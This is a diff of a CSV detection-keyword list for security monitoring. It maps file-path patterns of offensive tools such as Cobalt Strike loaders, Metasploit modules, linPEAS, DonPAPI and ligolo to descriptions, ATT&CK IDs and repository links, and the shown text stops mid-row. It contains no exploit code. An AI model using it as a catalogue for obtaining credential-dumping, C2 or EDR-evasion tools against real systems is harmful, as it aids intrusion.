+"*/ldeepDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
 "*/LetMeOutSharp/*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z"
 "*/lexmark-config.nse*","offensive_tool_keyword","nmap","Nmap NSE
Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/lgandx/Responder*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/lib/GHunt/*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" -"*/lib/ipLookupHelper.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*/lib/msf/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/libgobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*/liboffsetfinder64*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/lib/ipLookupHelper.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*/lib/msf/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/libgobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/liboffsetfinder64*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/LibSnaffle*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" "*/LightsOut.git*","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","3","243","29","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" "*/ligolo.git*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*/ligolo-ng*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" -"*/LinEnum.git*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 
- T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6220","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" -"*/LinEnum/*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6220","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" +"*/LinEnum.git*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" +"*/LinEnum/*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" "*/linpeas.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*/linpeas.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z"
+"*/linpeas.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z"
 "*/linux_ldso_dynamic.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
 "*/linux_ldso_hwcap.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
 "*/linux_ldso_hwcap_64.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
 "*/linux_offset2lib.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
-"*/linux-smart-enumeration.git*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
-"*/linWinPwn*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/linux-smart-enumeration.git*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
+"*/linWinPwn*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
"*/llmnr-resolve.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/lltd-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/load-assembly.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/load-assembly.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/LoadDllRemote.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*/loader/bypass.c","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*/loader/bypass.h","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/loader/bypass.c","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/loader/bypass.h","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "*/loader/x64/Release/loader.exe*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" "*/loadercrypt_*.php*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/local-exploits/master/CVE*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/LocalPotato.git*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" -"*/LocalPrivEsc/*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/LocalPrivEsc/*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*/localroot/2.6.x/elflbl*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/localroot/2.6.x/h00lyshit*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/Locksmith.git*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - 
TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","472","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" -"*/log4shell.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*/login_scanner*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/login-securite/DonPAPI*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/Locksmith.git*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" +"*/log4shell.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/login_scanner*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
